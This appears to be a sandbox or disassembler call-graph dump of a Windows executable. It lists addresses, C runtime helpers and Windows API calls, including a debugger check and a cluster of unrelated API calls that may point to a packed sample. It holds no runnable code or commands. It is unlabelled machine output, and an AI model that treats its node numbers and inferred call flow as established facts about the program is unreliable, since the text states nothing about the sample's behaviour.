___crtGetEnvironmentStringsA 39 API calls 4213->4214 4215 407be6 4214->4215 4216 40100f ___crtGetEnvironmentStringsA 39 API calls 4215->4216 4217 407bee 4216->4217 4218 40100f ___crtGetEnvironmentStringsA 39 API calls 4217->4218 4219 407bf6 4218->4219 4220 40100f ___crtGetEnvironmentStringsA 39 API calls 4219->4220 4221 407bfe 4220->4221 4222 40100f ___crtGetEnvironmentStringsA 39 API calls 4221->4222 4223 407c06 4222->4223 4224 40100f ___crtGetEnvironmentStringsA 39 API calls 4223->4224 4225 407c0e 4224->4225 4226 40100f ___crtGetEnvironmentStringsA 39 API calls 4225->4226 4227 407c16 4226->4227 4228 40100f ___crtGetEnvironmentStringsA 39 API calls 4227->4228 4229 407c1e 4228->4229 4230 40100f ___crtGetEnvironmentStringsA 39 API calls 4229->4230 4231 407c26 4230->4231 4232 40100f ___crtGetEnvironmentStringsA 39 API calls 4231->4232 4233 407c2e 4232->4233 4234 40100f ___crtGetEnvironmentStringsA 39 API calls 4233->4234 4235 407c36 4234->4235 4236 40100f ___crtGetEnvironmentStringsA 39 API calls 4235->4236 4237 407c3e 4236->4237 4238 40100f ___crtGetEnvironmentStringsA 39 API calls 4237->4238 4239 407c46 4238->4239 4240 40100f ___crtGetEnvironmentStringsA 39 API calls 4239->4240 4241 407c4e 4240->4241 4242 40100f ___crtGetEnvironmentStringsA 39 API calls 4241->4242 4243 407c5c 4242->4243 4244 40100f ___crtGetEnvironmentStringsA 39 API calls 4243->4244 4245 407c67 4244->4245 4246 40100f ___crtGetEnvironmentStringsA 39 API calls 4245->4246 4247 407c72 4246->4247 4248 40100f ___crtGetEnvironmentStringsA 39 API calls 4247->4248 4249 407c7d 4248->4249 4250 40100f ___crtGetEnvironmentStringsA 39 API calls 4249->4250 4251 407c88 4250->4251 4252 40100f ___crtGetEnvironmentStringsA 39 API calls 4251->4252 4253 407c93 4252->4253 4254 40100f ___crtGetEnvironmentStringsA 39 API calls 4253->4254 4255 407c9e 4254->4255 4256 40100f ___crtGetEnvironmentStringsA 39 API calls 4255->4256 4257 407ca9 4256->4257 4258 40100f ___crtGetEnvironmentStringsA 39 API calls 4257->4258 4259 407cb4 4258->4259 4260 40100f ___crtGetEnvironmentStringsA 39 API calls 4259->4260 4261 407cbf 4260->4261 4262 40100f ___crtGetEnvironmentStringsA 39 API calls 4261->4262 4262->4263 4263->4137 4264->4107 4266 405879 4265->4266 4269 4057c7 _memset 4265->4269 4271 401000 ___convertcp 5 API calls 4266->4271 4283 407af9 4269->4283 4273 405924 4271->4273 4273->3928 4274 4078fa ___crtLCMapStringA 79 API calls 4274->4266 4276 401008 4275->4276 4277 40100a IsDebuggerPresent 4275->4277 4276->3925 4450 404ad6 4277->4450 4280 4019dd SetUnhandledExceptionFilter UnhandledExceptionFilter 4281 401a02 GetCurrentProcess TerminateProcess 4280->4281 4282 4019fa __invoke_watson 4280->4282 4281->3925 4282->4281 4284 4031f7 _LocaleUpdate::_LocaleUpdate 49 API calls 4283->4284 4285 407b0c 4284->4285 4293 40793f 4285->4293 4288 4078fa 4289 4031f7 _LocaleUpdate::_LocaleUpdate 49 API calls 4288->4289 4290 40790d 4289->4290 4403 407555 4290->4403 4294 407960 GetStringTypeW 4293->4294 4295 40798b 4293->4295 4296 407980 GetLastError 4294->4296 4297 407978 4294->4297 4295->4297 4298 407a72 4295->4298 4296->4295 4299 4079c4 MultiByteToWideChar 4297->4299 4316 407a6c 4297->4316 4337 40836b GetLocaleInfoA 4298->4337 4306 4079f1 4299->4306 4299->4316 4301 401000 ___convertcp 5 API calls 4303 405834 4301->4303 4303->4288 4304 407ac3 GetStringTypeExA 4310 407ade 4304->4310 4304->4316 4305 407a06 _memset __alloca_probe_16 4309 407a3f MultiByteToWideChar 4305->4309 4305->4316 4306->4305 4317 40112c 4306->4317 4311 407a55 GetStringTypeW 4309->4311 4312 407a66 4309->4312 4313 40100f ___crtGetEnvironmentStringsA 39 API calls 4310->4313 4311->4312 4333 406681 4312->4333 4313->4316 4316->4301 4318 4011df 4317->4318 4329 40113e 4317->4329 4319 402c3d _malloc 6 API calls 4318->4319 4320 4011e5 4319->4320 4322 401a58 __fileno 38 API calls 4320->4322 4321 402bf5 __FF_MSGBANNER 38 API calls 4321->4329 4332 4011d7 4322->4332 4324 40119b HeapAlloc 4324->4329 4326 4011cb 4328 401a58 __fileno 38 API calls 4326->4328 4327 402c3d _malloc 6 API calls 4327->4329 4330 4011d0 4328->4330 4329->4321 4329->4324 4329->4326 4329->4327 4329->4330 4329->4332 4368 4014ab 4329->4368 4371 4010dd 4329->4371 4331 401a58 __fileno 38 API calls 4330->4331 4331->4332 4332->4305 4334 40668d 4333->4334 4335 40669e 4333->4335 4334->4335 4336 40100f ___crtGetEnvironmentStringsA 39 API calls 4334->4336 4335->4316 4336->4335 4338 408399 4337->4338 4339 40839e 4337->4339 4341 401000 ___convertcp 5 API calls 4338->4341 4384 4011f6 4339->4384 4342 407a96 4341->4342 4342->4304 4342->4316 4343 4083b4 4342->4343 4344 4083f4 GetCPInfo 4343->4344 4348 40847e 4343->4348 4345 408469 MultiByteToWideChar 4344->4345 4346 40840b 4344->4346 4345->4348 4352 408424 _strlen 4345->4352 4346->4345 4349 408411 GetCPInfo 4346->4349 4347 401000 ___convertcp 5 API calls 4350 407ab7 4347->4350 4348->4347 4349->4345 4351 40841e 4349->4351 4350->4304 4350->4316 4351->4345 4351->4352 4353 40112c _malloc 39 API calls 4352->4353 4357 408456 _memset __alloca_probe_16 4352->4357 4353->4357 4354 4084b3 MultiByteToWideChar 4355 4084ea 4354->4355 4356 4084cb 4354->4356 4358 406681 ___convertcp 39 API calls 4355->4358 4359 4084d2 WideCharToMultiByte 4356->4359 4360 4084ef 4356->4360 4357->4348 4357->4354 4358->4348 4359->4355 4361 4084fa WideCharToMultiByte 4360->4361 4362 40850e 4360->4362 4361->4355 4361->4362 4363 404b23 __calloc_crt 39 API calls 4362->4363 4364 408516 4363->4364 4364->4355 4365 40851f WideCharToMultiByte 4364->4365 4365->4355 4366 408531 4365->4366 4367 40100f ___crtGetEnvironmentStringsA 39 API calls 4366->4367 4367->4355 4377 401480 GetModuleHandleW 4368->4377 4372 4010e9 __initptd 4371->4372 4373 40111a __initptd 4372->4373 4374 401c4d __lock 39 API calls 4372->4374 4373->4329 4375 4010ff 4374->4375 4380 401123 4375->4380 4378 401494 GetProcAddress 4377->4378 4379 4014a4 ExitProcess 4377->4379 4378->4379 4383 401b73 LeaveCriticalSection 4380->4383 4382 40112a 4382->4373 4383->4382 4387 4034ad 4384->4387 4388 4034c6 4387->4388 4391 40327e 4388->4391 4392 4031f7 _LocaleUpdate::_LocaleUpdate 49 API calls 4391->4392 4394 403293 4392->4394 4393 4032a5 4395 401a58 __fileno 39 API calls 4393->4395 4394->4393 4399 4032e2 4394->4399 4396 4032aa 4395->4396 4397 4031d1 __fileno 6 API calls 4396->4397 4402 401207 4397->4402 4398 406108 __isctype_l 68 API calls 4398->4399 4399->4398 4400 403327 4399->4400 4401 401a58 __fileno 39 API calls 4400->4401 4400->4402 4401->4402 4402->4338 4404 407576 LCMapStringW 4403->4404 4408 407591 4403->4408 4405 407599 GetLastError 4404->4405 4404->4408 4405->4408 4406 40778f 4410 40836b ___ansicp 68 API calls 4406->4410 4407 4075eb 4409 407604 MultiByteToWideChar 4407->4409 4432 407786 4407->4432 4408->4406 4408->4407 4417 407631 4409->4417 4409->4432 4412 4077b7 4410->4412 4411 401000 ___convertcp 5 API calls 4413 405854 4411->4413 4414 4077d0 4412->4414 4415 4078ab LCMapStringA 4412->4415 4412->4432 4413->4274 4418 4083b4 ___convertcp 51 API calls 4414->4418 4449 407807 4415->4449 4416 407682 MultiByteToWideChar 4419 40769b LCMapStringW 4416->4419 4446 40777d 4416->4446 4421 40112c _malloc 39 API calls 4417->4421 4429 40764a __alloca_probe_16 4417->4429 4422 4077e2 4418->4422 4424 4076bc 4419->4424 4419->4446 4420 4078d2 4430 40100f ___crtGetEnvironmentStringsA 39 API calls 4420->4430 4420->4432 4421->4429 4426 4077ec LCMapStringA 4422->4426 4422->4432 4423 406681 ___convertcp 39 API calls 4423->4432 4427 4076c5 4424->4427 4428 4076ee 4424->4428 4425 40100f ___crtGetEnvironmentStringsA 39 API calls 4425->4420 4434 40780e 4426->4434 4426->4449 4433 4076d7 LCMapStringW 4427->4433 4427->4446 4431 407709 __alloca_probe_16 4428->4431 4436 40112c _malloc 39 API calls 4428->4436 4429->4416 4429->4432 4430->4432 4435 40773d LCMapStringW 4431->4435 4431->4446 4432->4411 4433->4446 4437 40112c _malloc 39 API calls 4434->4437 4441 40781f _memset __alloca_probe_16 4434->4441 4438 407755 WideCharToMultiByte 4435->4438 4439 407777 4435->4439 4436->4431 4437->4441 4438->4439 4442 406681 ___convertcp 39 API calls 4439->4442 4440 40785d LCMapStringA 4443 407879 4440->4443 4444 40787d 4440->4444 4441->4440 4441->4449 4442->4446 4448 406681 ___convertcp 39 API calls 4443->4448 4447 4083b4 ___convertcp 51 API calls 4444->4447 4446->4423 4447->4443 4448->4449 4449->4420 4449->4425 4450->4280 4452 401cef 4451->4452 4457 401f91 4451->4457 4453 401edb VirtualFree 4452->4453 4452->4457 4454 401f3f 4453->4454 4455 401f4e VirtualFree HeapFree 4454->4455 4454->4457 4461 404bc0 4455->4461 4457->3941 4465 401b73 LeaveCriticalSection 4458->4465 4460 40106c 4460->3932 4462 404bd8 4461->4462 4463 404bff __VEC_memcpy 4462->4463 4464 404c07 4462->4464 4463->4464 4464->4457 4465->4460 4467 401b96 __initptd 4466->4467 4468 402bf5 __FF_MSGBANNER 39 API calls 4467->4468 4479 401bbc 4467->4479 4473 401bab 4468->4473 4469 404ade __malloc_crt 39 API calls 4470 401bd7 4469->4470 4471 401bed 4470->4471 4472 401bde 4470->4472 4475 401c4d __lock 39 API calls 4471->4475 4474 401a58 __fileno 39 API calls 4472->4474 4476 4014ab _malloc 3 API calls 4473->4476 4477 401bcc __initptd 4474->4477 4478 401bf4 4475->4478 4476->4479 4477->3946 4480 401c28 4478->4480 4481 401bfc 4478->4481 4479->4469 4479->4477 4482 40100f ___crtGetEnvironmentStringsA 39 API calls 4480->4482 4490 4044c7 4481->4490 4484 401c19 4482->4484 4494 401c44 4484->4494 4485 401c07 4485->4484 4487 40100f ___crtGetEnvironmentStringsA 39 API calls 4485->4487 4488 401c13 4487->4488 4489 401a58 __fileno 39 API calls 4488->4489 4489->4484 4497 402744 4490->4497 4492 4044d3 InitializeCriticalSectionAndSpinCount 4493 404517 __initptd 4492->4493 4493->4485 4498 401b73 LeaveCriticalSection 4494->4498 4496 401c4b 4496->4477 4497->4492 4498->4496 4499->3951 4503 4066a1 4500->4503 4504 4031f7 _LocaleUpdate::_LocaleUpdate 49 API calls 4503->4504 4505 4066b4 4504->4505 4505->3851 4736 41d610 4739 41d240 4736->4739 4738 41d615 4740 41d250 __write_nolock 4739->4740 4741 41d2ce GetLogicalDriveStringsA 4740->4741 4742 41d2e1 4740->4742 4741->4740 4743 41d2f0 GetLastError 4742->4743 4744 41d303 4742->4744 4743->4742 4743->4744 4745 41d311 8 API calls 4744->4745 4746 41d3c0 4744->4746 4782 40109d 4745->4782 4748 41d3c9 6 API calls 4746->4748 4749 41d4bd LocalAlloc 4746->4749 4751 405080 _memset 4748->4751 4761 41d4d9 4749->4761 4754 41d41f 6 API calls 4751->4754 4755 41d4a6 OpenFileMappingA 4754->4755 4756 41d4af 4754->4756 4755->4756 4759 4011f6 ___ansicp 68 API calls 4756->4759 4757 41d3a4 4760 40112c _malloc 39 API calls 4757->4760 4758 41d513 4828 41cde0 GetModuleHandleW GetProcAddress 4758->4828 4763 41d4b5 4759->4763 4764 41d3aa 4760->4764 4827 41cf20 LoadLibraryW 4761->4827 4763->4749 4766 40100f ___crtGetEnvironmentStringsA 39 API calls 4764->4766 4768 41d3b0 4766->4768 4769 40109d _calloc 39 API calls 4768->4769 4772 41d3b7 4769->4772 4770 41d51d 4771 41d539 QueryMemoryResourceNotification 4770->4771 4774 41d55c InterlockedDecrement GetSystemTime 4770->4774 4775 41d570 4770->4775 4771->4770 4824 4016c7 4772->4824 4774->4770 4776 41d592 WriteConsoleOutputCharacterA 4775->4776 4777 41d5b4 4775->4777 4776->4775 4778 41d5c2 GetMonitorInfoA GetClassLongW 4777->4778 4779 41d5ec 4777->4779 4778->4777 4780 401000 ___convertcp 5 API calls 4779->4780 4781 41d5fd 4780->4781 4781->4738 4783 40292c __calloc_impl 39 API calls 4782->4783 4784 4010b7 4783->4784 4785 4010d3 4784->4785 4786 401a58 __fileno 39 API calls 4784->4786 4789 40120c 4785->4789 4787 4010ca 4786->4787 4787->4785 4788 401a58 __fileno 39 API calls 4787->4788 4788->4785 4790 401218 __initptd 4789->4790 4791 40122d 4790->4791 4792 40121f 4790->4792 4794 401240 4791->4794 4795 401234 4791->4795 4793 40112c _malloc 39 API calls 4792->4793 4815 401227 __dosmaperr __initptd 4793->4815 4802 4013b2 4794->4802 4813 40124d ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 4794->4813 4796 40100f ___crtGetEnvironmentStringsA 39 API calls 4795->4796 4796->4815 4797 4013e5 4799 402c3d _malloc 6 API calls 4797->4799 4798 4013b7 HeapReAlloc 4798->4802 4798->4815 4801 4013eb 4799->4801 4800 401c4d __lock 39 API calls 4800->4813 4803 401a58 __fileno 39 API calls 4801->4803 4802->4797 4802->4798 4804 401409 4802->4804 4805 402c3d _malloc 6 API calls 4802->4805 4808 4013ff 4802->4808 4803->4815 4806 401a58 __fileno 39 API calls 4804->4806 4804->4815 4805->4802 4809 401412 GetLastError 4806->4809 4810 401a58 __fileno 39 API calls 4808->4810 4809->4815 4822 401380 4810->4822 4811 4012d8 HeapAlloc 4811->4813 4812 40132d HeapReAlloc 4812->4813 4813->4797 4813->4800 4813->4811 4813->4812 4813->4815 4816 401398 4813->4816 4817 402c3d _malloc 6 API calls 4813->4817 4820 40137b 4813->4820 4823 401cb0 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 4813->4823 4841 401350 4813->4841 4814 401385 GetLastError 4814->4815 4815->4757 4816->4815 4818 401a58 __fileno 39 API calls 4816->4818 4817->4813 4819 4013a5 4818->4819 4819->4809 4819->4815 4821 401a58 __fileno 39 API calls 4820->4821 4821->4822 4822->4814 4822->4815 4823->4813 4825 40159b _doexit 43 API calls 4824->4825 4826 4016d8 4825->4826 4826->4746 4827->4758 4829 41cf1b 4828->4829 4830 41d1b0 4829->4830 4845 41d010 4830->4845 4833 41d1e9 GetEnvironmentStringsW 4834 41d1ef 4833->4834 4850 41d080 4834->4850 4837 41d207 GetConsoleAliasesA GetVolumePathNameA 4838 41d228 4837->4838 4839 401000 ___convertcp 5 API calls 4838->4839 4840 41d236 4839->4840 4840->4770 4844 401b73 LeaveCriticalSection 4841->4844 4843 401357 4843->4813 4844->4843 4846 41d051 4845->4846 4847 41d03c GetCommandLineA GetModuleFileNameA 4845->4847 4848 401000 ___convertcp 5 API calls 4846->4848 4847->4846 4849 41d05f 4848->4849 4849->4833 4849->4834 4851 41d0af 4850->4851 4852 41d16d 4850->4852 4851->4852 4856 41d111 6 API calls 4851->4856 4857 41d070 4851->4857 4854 401000 ___convertcp 5 API calls 4852->4854 4855 41d19d 4854->4855 4855->4837 4855->4838 4856->4851 4860 41cfc0 4857->4860 4861 41cfdd DeleteAce 4860->4861 4862 41cfee 4860->4862 4861->4862 4862->4851 4863 402e14 4878 402744 4863->4878 4865 402e20 GetStartupInfoA 4866 404b23 __calloc_crt 39 API calls 4865->4866 4872 402e41 4866->4872 4867 40305f __initptd 4868 402fdc GetStdHandle 4873 402fa6 4868->4873 4869 404b23 __calloc_crt 39 API calls 4869->4872 4870 403041 SetHandleCount 4870->4867 4871 402fee GetFileType 4871->4873 4872->4867 4872->4869 4872->4873 4875 402f29 4872->4875 4873->4867 4873->4868 4873->4870 4873->4871 4876 4044c7 ___lock_fhandle InitializeCriticalSectionAndSpinCount 4873->4876 4874 402f52 GetFileType 4874->4875 4875->4867 4875->4873 4875->4874 4877 4044c7 ___lock_fhandle InitializeCriticalSectionAndSpinCount 4875->4877 4876->4873 4877->4875 4878->4865 4506 403c55 GetModuleHandleW 4507 403c6f 4506->4507 4508 403c69 4506->4508 4510 403dd8 4507->4510 4511 403c7a GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4507->4511 4509 401427 __crt_waiting_on_module_handle 2 API calls 4508->4509 4509->4507 4560 40396f 4510->4560 4513 403cc3 TlsAlloc 4511->4513 4515 403ddd 4513->4515 4516 403d11 TlsSetValue 4513->4516 4516->4515 4517 403d22 4516->4517 4539 401711 4517->4539 4522 403845 __encode_pointer 6 API calls 4523 403d42 4522->4523 4524 403845 __encode_pointer 6 API calls 4523->4524 4525 403d52 4524->4525 4526 403845 __encode_pointer 6 API calls 4525->4526 4527 403d62 4526->4527 4556 401ad1 4527->4556 4530 4038c0 __decode_pointer 6 API calls 4531 403d83 4530->4531 4531->4510 4532 404b23 __calloc_crt 39 API calls 4531->4532 4533 403d9c 4532->4533 4533->4510 4534 4038c0 __decode_pointer 6 API calls 4533->4534 4535 403db6 4534->4535 4535->4510 4536 403dbd 4535->4536 4537 4039ac __initptd 39 API calls 4536->4537 4538 403dc5 GetCurrentThreadId 4537->4538 4538->4515 4566 4038b7 4539->4566 4541 401719 __init_pointers __initp_misc_winsig 4569 404116 4541->4569 4544 403845 __encode_pointer 6 API calls 4545 401755 4544->4545 4546 403845 TlsGetValue 4545->4546 4547 40385d 4546->4547 4548 40387e GetModuleHandleW 4546->4548 4547->4548 4551 403867 TlsGetValue 4547->4551 4549 403899 GetProcAddress 4548->4549 4550 40388e 4548->4550 4553 403876 4549->4553 4552 401427 __crt_waiting_on_module_handle 2 API calls 4550->4552 4555 403872 4551->4555 4554 403894 4552->4554 4553->4522 4554->4549 4554->4553 4555->4548 4555->4553 4557 401adc 4556->4557 4558 401b0a 4557->4558 4559 4044c7 ___lock_fhandle InitializeCriticalSectionAndSpinCount 4557->4559 4558->4510 4558->4530 4559->4557 4561 403979 4560->4561 4562 403985 4560->4562 4563 4038c0 __decode_pointer 6 API calls 4561->4563 4564 4039a7 4562->4564 4565 403999 TlsFree 4562->4565 4563->4562 4564->4564 4565->4564 4567 403845 __encode_pointer 6 API calls 4566->4567 4568 4038be 4567->4568 4568->4541 4570 403845 __encode_pointer 6 API calls 4569->4570 4571 40174b 4570->4571 4571->4544 4879 401516 4881 401524 __IsNonwritableInCurrentImage 4879->4881 4885 403f6c 4881->4885 4882 401542 __initterm_e 4884 401561 __IsNonwritableInCurrentImage __initterm 4882->4884 4889 403f09 4882->4889 4886 403f72 4885->4886 4887 403845 __encode_pointer 6 API calls 4886->4887 4888 403f8a 4886->4888 4887->4886 4888->4882 4892 403ecd 4889->4892 4891 403f16 4891->4884 4893 403ed9 __initptd 4892->4893 4900 4014c3 4893->4900 4899 403efa __initptd 4899->4891 4901 401c4d __lock 39 API calls 4900->4901 4902 4014ca 4901->4902 4903 403de2 4902->4903 4904 4038c0 __decode_pointer 6 API calls 4903->4904 4905 403df6 4904->4905 4906 4038c0 __decode_pointer 6 API calls 4905->4906 4907 403e06 4906->4907 4915 403e89 4907->4915 4923 4064be 4907->4923 4909 403845 __encode_pointer 6 API calls 4911 403e7e 4909->4911 4910 403e24 4913 403e48 4910->4913 4919 403e70 4910->4919 4936 404b6f 4910->4936 4914 403845 __encode_pointer 6 API calls 4911->4914 4913->4915 4916 404b6f __realloc_crt 45 API calls 4913->4916 4917 403e5e 4913->4917 4914->4915 4920 403f03 4915->4920 4916->4917 4917->4915 4918 403845 __encode_pointer 6 API calls 4917->4918 4918->4919 4919->4909 4945 4014cc 4920->4945 4924 4064ca __initptd 4923->4924 4925 4064f7 4924->4925 4926 4064da 4924->4926 4928 406538 HeapSize 4925->4928 4929 401c4d __lock 39 API calls 4925->4929 4927 401a58 __fileno 39 API calls 4926->4927 4930 4064df 4927->4930 4931 4064ef __initptd 4928->4931 4933 406507 ___sbh_find_block 4929->4933 4932 4031d1 __fileno 6 API calls 4930->4932 4931->4910 4932->4931 4941 406558 4933->4941 4940 404b78 4936->4940 4937 40120c _realloc 44 API calls 4937->4940 4938 404bb7 4938->4913 4939 404b98 Sleep 4939->4940 4940->4937 4940->4938 4940->4939 4944 401b73 LeaveCriticalSection 4941->4944 4943 406533 4943->4928 4943->4931 4944->4943 4948 401b73 LeaveCriticalSection 4945->4948 4947 4014d3 4947->4899 4948->4947 4949 402d16 4956 4056f7 4949->4956 4952 402d29 4954 40100f ___crtGetEnvironmentStringsA 39 API calls 4952->4954 4955 402d34 4954->4955 4969 40561d 4956->4969 4958 402d1b 4958->4952 4959 4054ce 4958->4959 4960 4054da __initptd 4959->4960 4961 401c4d __lock 39 API calls 4960->4961 4962 4054e6 4961->4962 4963 40554f 4962->4963 4967 405524 DeleteCriticalSection 4962->4967 4997 4069a0 4962->4997 5010 405564 4963->5010 4965 40555b __initptd 4965->4952 4968 40100f ___crtGetEnvironmentStringsA 39 API calls 4967->4968 4968->4962 4970 405629 __initptd 4969->4970 4971 401c4d __lock 39 API calls 4970->4971 4976 405638 4971->4976 4972 4056d0 4987 4056ee 4972->4987 4975 4056dc __initptd 4975->4958 4976->4972 4978 4055d5 80 API calls __fflush_nolock 4976->4978 4979 402d77 4976->4979 4984 4056bf 4976->4984 4978->4976 4980 402d84 4979->4980 4981 402d9a EnterCriticalSection 4979->4981 4982 401c4d __lock 39 API calls 4980->4982 4981->4976 4983 402d8d 4982->4983 4983->4976 4990 402de5 4984->4990 4986 4056cd 4986->4976 4996 401b73 LeaveCriticalSection 4987->4996 4989 4056f5 4989->4975 4991 402df5 4990->4991 4992 402e08 LeaveCriticalSection 4990->4992 4995 401b73 LeaveCriticalSection 4991->4995 4992->4986 4994 402e05 4994->4986 4995->4994 4996->4989 4998 4069ac __initptd 4997->4998 4999 4069c0 4998->4999 5000 4069dd 4998->5000 5001 401a58 __fileno 39 API calls 4999->5001 5007 4069d5 __initptd 5000->5007 5013 402d36 5000->5013 5002 4069c5 5001->5002 5004 4031d1 __fileno 6 API calls 5002->5004 5004->5007 5007->4962 5259 401b73 LeaveCriticalSection 5010->5259 5012 40556b 5012->4965 5014 402d48 5013->5014 5015 402d6a EnterCriticalSection 5013->5015 5014->5015 5016 402d50 5014->5016 5017 402d60 5015->5017 5018 401c4d __lock 39 API calls 5016->5018 5019 406929 5017->5019 5018->5017 5020 406959 5019->5020 5021 40693d 5019->5021 5022 406952 5020->5022 5038 40556d 5020->5038 5023 401a58 __fileno 39 API calls 5021->5023 5035 406a14 5022->5035 5025 406942 5023->5025 5026 4031d1 __fileno 6 API calls 5025->5026 5026->5022 5033 406979 5033->5022 5034 40100f ___crtGetEnvironmentStringsA 39 API calls 5033->5034 5034->5022 5252 402da9 5035->5252 5037 406a1a 5037->5007 5039 405586 5038->5039 5043 4055a8 5038->5043 5040 403068 __fileno 39 API calls 5039->5040 5039->5043 5041 4055a1 5040->5041 5077 40714f 5041->5077 5044 4080b5 5043->5044 5045 40696d 5044->5045 5046 4080c5 5044->5046 5048 403068 5045->5048 5046->5045 5047 40100f ___crtGetEnvironmentStringsA 39 API calls 5046->5047 5047->5045 5049 40308c 5048->5049 5050 403077 5048->5050 5054 407fe8 5049->5054 5051 401a58 __fileno 39 API calls 5050->5051 5052 40307c 5051->5052 5053 4031d1 __fileno 6 API calls 5052->5053 5053->5049 5055 407ff4 __initptd 5054->5055 5056 408017 5055->5056 5057 407ffc 5055->5057 5059 408025 5056->5059 5062 408066 5056->5062 5058 401a6b __write_nolock 39 API calls 5057->5058 5060 408001 5058->5060 5061 401a6b __write_nolock 39 API calls 5059->5061 5063 401a58 __fileno 39 API calls 5060->5063 5064 40802a 5061->5064 5066 40748e ___lock_fhandle 40 API calls 5062->5066 5072 408009 __initptd 5063->5072 5065 401a58 __fileno 39 API calls 5064->5065 5067 408031 5065->5067 5068 40806c 5066->5068 5069 4031d1 __fileno 6 API calls 5067->5069 5070 408087 5068->5070 5071 408079 5068->5071 5069->5072 5074 401a58 __fileno 39 API calls 5070->5074 5224 407f4c 5071->5224 5072->5033 5075 408081 5074->5075 5239 4080ab 5075->5239 5078 40715b __initptd 5077->5078 5079 407163 5078->5079 5080 40717e 5078->5080 5102 401a6b 5079->5102 5081 40718c 5080->5081 5086 4071cd 5080->5086 5083 401a6b __write_nolock 39 API calls 5081->5083 5085 407191 5083->5085 5088 401a58 __fileno 39 API calls 5085->5088 5105 40748e 5086->5105 5087 401a58 __fileno 39 API calls 5096 407170 __initptd 5087->5096 5090 407198 5088->5090 5092 4031d1 __fileno 6 API calls 5090->5092 5091 4071d3 5093 4071e0 5091->5093 5094 4071f6 5091->5094 5092->5096 5115 406a1c 5093->5115 5095 401a58 __fileno 39 API calls 5094->5095 5099 4071fb 5095->5099 5096->5043 5098 4071ee 5173 407221 5098->5173 5100 401a6b __write_nolock 39 API calls 5099->5100 5100->5098 5103 403a93 __getptd_noexit 39 API calls 5102->5103 5104 401a70 5103->5104 5104->5087 5106 40749a __initptd 5105->5106 5107 4074f5 5106->5107 5110 401c4d __lock 39 API calls 5106->5110 5108 407517 __initptd 5107->5108 5109 4074fa EnterCriticalSection 5107->5109 5108->5091 5109->5108 5111 4074c6 5110->5111 5112 4074dd 5111->5112 5114 4044c7 ___lock_fhandle InitializeCriticalSectionAndSpinCount 5111->5114 5176 407525 5112->5176 5114->5112 5116 406a2b __write_nolock 5115->5116 5117 406a84 5116->5117 5118 406a5d 5116->5118 5148 406a52 5116->5148 5122 406aec 5117->5122 5123 406ac6 5117->5123 5119 401a6b __write_nolock 39 API calls 5118->5119 5121 406a62 5119->5121 5120 401000 ___convertcp 5 API calls 5124 40714d 5120->5124 5126 401a58 __fileno 39 API calls 5121->5126 5125 406b00 5122->5125 5180 40730c 5122->5180 5127 401a6b __write_nolock 39 API calls 5123->5127 5124->5098 5190 4082dc 5125->5190 5129 406a69 5126->5129 5131 406acb 5127->5131 5133 4031d1 __fileno 6 API calls 5129->5133 5132 401a58 __fileno 39 API calls 5131->5132 5135 406ad4 5132->5135 5133->5148 5134 406b0b 5136 406db1 5134->5136 5140 403b0c __getptd 39 API calls 5134->5140 5137 4031d1 __fileno 6 API calls 5135->5137 5138 407080 WriteFile 5136->5138 5139 406dc1 5136->5139 5137->5148 5141 4070b3 GetLastError 5138->5141 5142 406d93 5138->5142 5143 406e9f 5139->5143 5161 406dd5 5139->5161 5144 406b26 GetConsoleMode 5140->5144 5141->5142 5145 4070fe 5142->5145 5142->5148 5150 4070d1 5142->5150 5164 406f7f 5143->5164 5166 406eae 5143->5166 5144->5136 5146 406b51 5144->5146 5145->5148 5149 401a58 __fileno 39 API calls 5145->5149 5146->5136 5147 406b63 GetConsoleCP 5146->5147 5147->5142 5171 406b86 __write_nolock 5147->5171 5148->5120 5152 407121 5149->5152 5154 4070f0 5150->5154 5155 4070dc 5150->5155 5151 406e43 WriteFile 5151->5141 5151->5161 5156 401a6b __write_nolock 39 API calls 5152->5156 5153 406fe5 WideCharToMultiByte 5153->5141 5158 40701c WriteFile 5153->5158 5202 401a7e 5154->5202 5157 401a58 __fileno 39 API calls 5155->5157 5156->5148 5162 4070e1 5157->5162 5163 407053 GetLastError 5158->5163 5158->5164 5159 406f23 WriteFile 5159->5141 5159->5166 5161->5142 5161->5145 5161->5151 5165 401a6b __write_nolock 39 API calls 5162->5165 5163->5164 5164->5142 5164->5145 5164->5153 5164->5158 5165->5148 5166->5142 5166->5145 5166->5159 5168 406c32 WideCharToMultiByte 5168->5142 5169 406c63 WriteFile 5168->5169 5169->5141 5169->5171 5170 4080e6 11 API calls __putwch_nolock 5170->5171 5171->5141 5171->5142 5171->5168 5171->5170 5172 406cb7 WriteFile 5171->5172 5199 407f08 5171->5199 5172->5141 5172->5171 5223 40752e LeaveCriticalSection 5173->5223 5175 407229 5175->5096 5179 401b73 LeaveCriticalSection 5176->5179 5178 40752c 5178->5107 5179->5178 5207 407417 5180->5207 5182 40732a 5183 407332 5182->5183 5184 407343 SetFilePointer 5182->5184 5185 401a58 __fileno 39 API calls 5183->5185 5186 40735b GetLastError 5184->5186 5187 407337 5184->5187 5185->5187 5186->5187 5188 407365 5186->5188 5187->5125 5189 401a7e __dosmaperr 39 API calls 5188->5189 5189->5187 5191 4082f8 5190->5191 5192 4082e9 5190->5192 5194 401a58 __fileno 39 API calls 5191->5194 5197 40831c 5191->5197 5193 401a58 __fileno 39 API calls 5192->5193 5195 4082ee 5193->5195 5196 40830c 5194->5196 5195->5134 5198 4031d1 __fileno 6 API calls 5196->5198 5197->5134 5198->5197 5220 407ed0 5199->5220 5203 401a6b __write_nolock 39 API calls 5202->5203 5204 401a89 __dosmaperr 5203->5204 5205 401a58 __fileno 39 API calls 5204->5205 5206 401a9c 5205->5206 5206->5148 5208 407424 5207->5208 5209 40743c 5207->5209 5210 401a6b __write_nolock 39 API calls 5208->5210 5211 401a6b __write_nolock 39 API calls 5209->5211 5216 407481 5209->5216 5212 407429 5210->5212 5213 40746a 5211->5213 5214 401a58 __fileno 39 API calls 5212->5214 5215 401a58 __fileno 39 API calls 5213->5215 5217 407431 5214->5217 5218 407471 5215->5218 5216->5182 5217->5182 5219 4031d1 __fileno 6 API calls 5218->5219 5219->5216 5221 4031f7 _LocaleUpdate::_LocaleUpdate 49 API calls 5220->5221 5222 407ee3 5221->5222 5222->5171 5223->5175 5225 407417 __lseeki64_nolock 39 API calls 5224->5225 5226 407f5c 5225->5226 5227 407fb2 5226->5227 5229 407f90 5226->5229 5231 407417 __lseeki64_nolock 39 API calls 5226->5231 5242 407391 5227->5242 